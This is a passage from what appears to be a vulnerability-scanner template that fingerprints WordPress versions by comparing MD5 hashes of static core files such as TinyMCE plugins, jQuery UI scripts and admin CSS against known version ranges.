3.5 - 3.8.35 - dsl: - - "(\"1c9dba9ba82579d5e865bbd33e325354\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"2dccc8818dffd06a3a234f0bc52135b4\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"1303c105ad0a1ce44c27e106825a3eda\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"ebb309bfaa19a8b3c0e9051cc3e73df9\" == md5(body))" - - type: dsl - name: 2.8 - 3.0.6 - dsl: - - "(\"cac808d6007f1003b334e315f01ceec6\" == md5(body))" - - type: dsl - name: 2.7 - 2.7.1 - dsl: - - "(\"1e782a443c073b57897597a0720e2a82\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"7f564d3939db8324b11699de512a1562\" == md5(body))" - - type: dsl - name: 2.5 - 2.5.1 - dsl: - - "(\"d753adf6dd8922ef62944d3daf3f93c7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/tabfocus/editor_plugin.js" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"d3e5ef7a1a203516af0d8fdf94952fd2\" == md5(body))" - - type: dsl - name: 3.3 - 3.4.2 - dsl: - - "(\"dccf6d391c252e2571f2ed4b15fba889\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"2993514e91cbf86c13ba3ca12b7a19e0\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"15397ee0ab8280702de894ed2c8e9e40\" == md5(body))" - - type: dsl - name: 2.8 - 3.0.6 - dsl: - - "(\"1a8e22759ea3340a010af52f4210a26e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/tabfocus/editor_plugin_src.js" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"12889ccf8caf1d466859ba949f52fbca\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"8cf50fd7b506d6ee501f58d19c68eedf\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/directionality/editor_plugin.js" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"e2d925fe1e778dbcade06d55164fc276\" == md5(body))" - - type: dsl - name: 2.8 - 3.4.2 - dsl: - - "(\"653c3a89058b610fd12242faf4f01cdf\" == md5(body))" - - type: dsl - name: 2.5 - 2.7.1 - dsl: - - "(\"7713d6e3e2531ea5047b4e2532448d43\" == md5(body))" - - type: dsl - name: 2.2 - 2.3.3 - dsl: - - "(\"7877f482e6df41494a9e0ae82c6bd33c\" == md5(body))" - - type: dsl - name: 2.1 - 2.1.3 - dsl: - - "(\"d05c4cbac3ecae620c904462a43774ed\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"15016a76dc405fe716a2cce3ea67e0f5\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/directionality/editor_plugin_src.js" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"9da7f763c6a1f1b7fc61582e7d454cc3\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"7a8992f2005bd63d97c151edb2d67ce9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/img/media.gif" - matchers: - - type: dsl - name: 2.6 - 3.8.35 - dsl: - - "(\"b1a62e29a44128ae7a3d932b4941ea33\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/img/trans.gif" - matchers: - - type: dsl - name: 2.5 - 3.8.35 - dsl: - - "(\"12bf9e19374920de3146a64775f46a5e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/img/page.gif" - matchers: - - type: dsl - name: 2.5 - 3.8.35 - dsl: - - "(\"ec8d1ed1b0fd137cacdda9e316ebed31\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/img/video.gif" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"233f9a78eadddb26f8976682e6d1bf44\" == md5(body))" - - type: dsl - name: 2.6 - 3.4.2 - dsl: - - "(\"10a455edf8439d00599854ffd2add437\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/img/audio.gif" - matchers: - - type: dsl - name: 2.6 - 3.8.35 - dsl: - - "(\"edc58dce8aab5d12e83fd4aac849cc05\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/img/image.gif" - matchers: - - type: dsl - name: 3.5 - 3.8.35 - dsl: - - "(\"fe5bd0edc99f44dfe3ec2302359a7f81\" == md5(body))" - - type: dsl - name: 2.6 - 3.4.2 - dsl: - - "(\"c25dc2e7e5c0c2203ca0ca516ca852a9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/lock.png" - matchers: - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"1acca50f0abf4ccd7a0f34669815158a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/images/lock-2x.png" - matchers: - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"6e0a92872a2545f5bf44bf7e3daa73c1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors.css" - matchers: - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"70f1542f61be52ac4751c00563434e07\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors-rtl.css" - matchers: - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"a67ae8fd5b6ca211970eed4a7e466bbb\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors-rtl.min.css" - matchers: - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"b94de9cd5aa0fbbbf9b48d7338969e3b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors.min.css" - matchers: - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"ac70977f942003cec4863894ecb13b10\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/theme-preview.js" - matchers: - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"7780c09b0a726bc2cad5416aa4f6d253\" == md5(body))" - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"36dabc552ff9315e1e782ad144ea383d\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"7897b96ae14a96dbe9cd2e5f8236eb10\" == md5(body))" - - type: dsl - name: 3.0 - 3.3.3 - dsl: - - "(\"8c36f08abc18e61fdc1be3e450198829\" == md5(body))" - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"2a45bb51fcab2c53f7e723ca2daf1847\" == md5(body))" - - type: dsl - name: 2.6 - 2.7.1 - dsl: - - "(\"74c371f0a247009485920605bcc286b3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/theme-preview.min.js" - matchers: - - type: dsl - name: 3.7 - 3.8.35 - dsl: - - "(\"e95ad5d62ad2871162b4636b2884d907\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"7897b96ae14a96dbe9cd2e5f8236eb10\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/theme-install.js" - matchers: - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"f0dbe61086f880896f44ddb173933101\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect-clip.min.js" - matchers: - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"38df21cba8ed00415b2229c3053f0a31\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"71a13d33f3fc7de23f13adcc4593a5a2\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"c566a56516cfa9b0f5f0af9515edd008\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.droppable.min.js" - matchers: - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"c86a22c5e36db0f80387ce5de67787e9\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"79ea08a1eb866ba2039cc617ada702de\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"0d6eef31f7bd7215fc554b1455435efc\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"07b2b6e067cae96848f1e017015e707e\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"82d400563161bb3afc1f882102b294c0\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect-drop.min.js" - matchers: - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"2115305b0244e5d8cfb9dc458c3e1697\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"1d045fd3777c8376972022e868891b86\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"82eab8c3912d259f462a229b7b4f2081\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.progressbar.min.js" - matchers: - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"68e1e677a33fca5ac047a6a85166aef2\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"35086553121b0423a8f2eaaedca79152\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"e90017815cdefec31a27eef26a1df6f7\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"ebaf9ac23de07b1e2edf1cfdd9d24859\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"ae1d9455fbd716115805a887d3942d2b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.selectable.min.js" - matchers: - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"1e412d9b7ffb5165882ec4ee9dca7706\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"6908d69d10dae3d04c23ca83a884ba6f\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"5498a8027d4314a6b7aecc07400c15f8\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"2a4ae2945b0ad112bc7453746e73fef0\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"5fd0d80a25092cf8dc3d9e4828ec0752\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect-pulsate.min.js" - matchers: - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"fe8fa2aa4dd64302aa4481758019ff12\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"3d639b4c14c1f6b080f746b7250554c3\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"5ac5c5ca652b881fe4073440719f9102\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect-highlight.min.js" - matchers: - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"ad71fc19d449fe8ecd391a90dc4de8e0\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"15b8d390675cf17bc3a73c3619557fb4\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"da7641af95d688d998c837bec535ea88\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.tabs.min.js" - matchers: - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"ae99e1c6db93d17a07dcce723c463239\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"3d531a65189ab04b164e9ac6ff708c06\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"490d0168365536638cb63e97b69494b1\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"b2f62945320bd46f2e119cec08b9996a\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"67beffac9e06139da85198dadac7e62c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect-shake.min.js" - matchers: - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"889151a84fe86e382bb7179f1206fe96\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"782fbb6948781cffd80ddf4030196952\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"4b5ef540c8212613d8bc80c90386b522\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.button.min.js" - matchers: - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"13e7c6415ec4583e4b315e58ec4b7834\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"1cc433c88d349c513c801378c4493f19\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"841ae1782456e0e034e446bc34c18a82\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"7ad0bc035cc7e8e29092f06b28c80220\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"1f54112461c2b804e4bda1b4ba414694\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.resizable.min.js" - matchers: - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"e3530409f1b673099f3d157d6c76c204\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"1cca9d1d61a8a9bef77cfea0f39e793d\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"ea9fbda91a34e85949e727926665f4af\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"26865f17edea007af640cfb6abc38d7a\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"c14059b12deb5821c173ddbe02779cfe\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.dialog.min.js" - matchers: - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"a4ffef594374acd633876798ffea4b91\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"3248497acc4c9a3eae7d094860937708\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"29610778c84d9db4858c8aafe9315229\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"a360a66b85be756d2fefd8b1ed4c4105\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"cedbf30a51c03d9ea72743da1cea9402\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect-scale.min.js" - matchers: - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"517c49b86b5c4222824e33cf97a66d1b\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"783b0ad56b1a8a97b76079a1d41c6f88\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"ebae30aac3140e8c77dff67bfe0aba5d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.position.min.js" - matchers: - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"99dbb2ac7cccbbc1686ff85eaf708cbf\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"eb63c3d2dace62e102af74004ccd0ff1\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"dd2ebb2a9d3b4d3e6fc95142fe607e34\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"61d86a8b3e7d4fcefbac74a1fe050f74\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"ce593c703df82b3e1785156376ef1a11\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect-fade.min.js" - matchers: - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"f61525a55b0447eff9182e652db51d93\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"79debe8459f8ceca8443086bf29e16a0\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"36eebb647c0021b081027d95a4681a08\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect.min.js" - matchers: - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"96f1e6bd9d9d042789d9b8f297e1ffe8\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"ea7d13d6d2212ba59159c40b2a57bd3b\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"14927dd90ee28ed46043547c56638549\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.core.min.js" - matchers: - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"47a22779d977534304f6cb122c97941a\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"739cf68f21c10e04cde3ad13fcff9063\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"f8d56d3c5539aa7af2a7d5c3b8769fad\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"c57795d684b34461c7ab90c951c7b7ee\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"35c8345d40fba7cc538b677eef8ec850\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.autocomplete.min.js" - matchers: - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"baad8e5edee09423cfe9ee7bb80f7f4a\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"c6c4d43ac586574589a0ec4542a890a8\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"697382ab550d87badbc9e4f8ba547b60\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"cc93470f358beca9abfc5b0429a6147b\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"e4781373802509fc3a51adb8a94cecc8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.accordion.min.js" - matchers: - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"6b215c5f733a5bca4b177f9bda08f9f4\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"1da489eb8b596be7a49f1be959249988\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"75ac483f270380c9a0a4e8eb5b6f3dd0\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"45b90c748b46dead2768518a6b0709c7\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"c4472933c20ad20fc1d3d07cf3faa1e8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.menu.min.js" - matchers: - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"023299ce8c17c78401167034e5b85450\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"e0b94d0041ca790b68af39edf821d238\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"3b0fa982a618f8885056b51d41076d0c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.widget.min.js" - matchers: - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"6af6a92aebd26adca4ae22c3d09461f6\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"2425a542e6dde093dd85ac0b5adc0141\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"a5626b56956b854edc4435086b81e642\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"7348be0976e007a8c2c02771b5e56ffa\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"0b4c5afffc6ba25e76716562a9c40a75\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect-fold.min.js" - matchers: - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"ae38de0e6df5afa3bedc421925ce7096\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"f8cda9cadd854d552cc429d799274962\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"8074c41343e8123a8567de8af452fc72\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.tooltip.min.js" - matchers: - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"2e5eaa037be632c86345268ee8c1fe6b\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"4fbdb31340b01c249a0fe5112e0eeec9\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"a0c1fb100694e7e398afd0a3517e8273\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect-slide.min.js" - matchers: - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"66bbb2f50ed3e02600c28fc7c859b05e\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"945300af618d04041dc49a0a5d36a917\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"d1d2843cdbebec3ec262539e8f482655\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.spinner.min.js" - matchers: - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"e30fecf15dccffecff23eb28c1be77af\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"ab6ea5b371afc02315dfaa7dfd4a1063\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"7a5e4203edf87c7e35b57c63bcc34903\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.datepicker.min.js" - matchers: - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"362c4b75ca21578fd5c432d32fc9f1e9\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"4eac58ed8deb3189c8d05bab9187f1ce\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"e36a086123756412293231aead17f24f\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"2a31d31b165267910cc15a22bcbf14ca\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"abc084e9e6b74f46560d1907bcfd87d5\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.draggable.min.js" - matchers: - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"2f11b4228a5e5d7c7dbc5531759950cf\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"67b603ea0e4abe708f871111fcf45738\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"8c3ca109cbf3a09e50c356b6a1826c05\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"5bf4c3ca95229659f8d7b0cf7d8cc1d3\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"8c466e9448e2b021e622219c814dad45\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect-bounce.min.js" - matchers: - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"21cc68d16d1f76275ad082d7ddb3e178\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"81ee7ab27ed9b0f3556a406ff6aad80b\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"575070d688f2df8beb11595b36a5406d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect-transfer.min.js" - matchers: - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"2fef9f5562e8443aa48377192b176cd4\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"e91b94a47085eac01afbf48c8cd515f0\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"0df5a22bfac5e648139f4a3cabfb39b6\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.mouse.min.js" - matchers: - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"b05882cb208b67920eaa74118594be2d\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"513bb6d79ab29c58ab1b32646216a3a0\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"2b09e33474c5641d8b63eaf28e870a66\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"039f3a81ac2f843432776ee10243b89a\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"10c48f90c42550a8afeb81ec34650b10\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect-blind.min.js" - matchers: - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"8780c4224e8780a782bf0cbd950730e3\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"625c5e7376d305ce4a11fd1277de5734\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"77bc3e84b750f288c68d789dfb28144f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.effect-explode.min.js" - matchers: - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"6c1e41c026f4d9164e07a06acf53e297\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"3ae92de7419e58815544147641a87930\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"ffec1f546e53676923f4a05ca20790a8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.slider.min.js" - matchers: - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"6c2a0e39e722f5d2a71050ee333fd2c5\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"f1b234712eabc4fea71eaadcf2e73ffa\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"38d250e04af3d561f01156273f08d578\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"9d26e2b237072855950bf775167fc9ea\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"0372be5e22fbd74d08ffea592641b29d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/jquery/ui/jquery.ui.sortable.min.js" - matchers: - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"765770c2918bd191e5ddb68675cc646c\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"cccbd3de04d2ff8cd30164925353c394\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"4a6b8c51735314ad669b4a73eab51726\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"24834266535ff3a5db2919a4dfa3a3b6\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"a8028f7b79584c14f5a092ed63affd4d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/skins/wordpress/images/dashicon-no-alt.png" - matchers: - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"1f8f2cd07a0f188ec8d9ff9275c45195\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpfullscreen/plugin.min.js" - matchers: - - type: dsl - name: 4.1 - 4.2.29 - dsl: - - "(\"76c195e5f157603feb495fe3fffbc33d\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"752bc22829ec5687577f564a98637b9b\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"e0ed4ec71acf14a2635ccbbad48a5a9f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpfullscreen/plugin.js" - matchers: - - type: dsl - name: 4.1 - 4.2.29 - dsl: - - 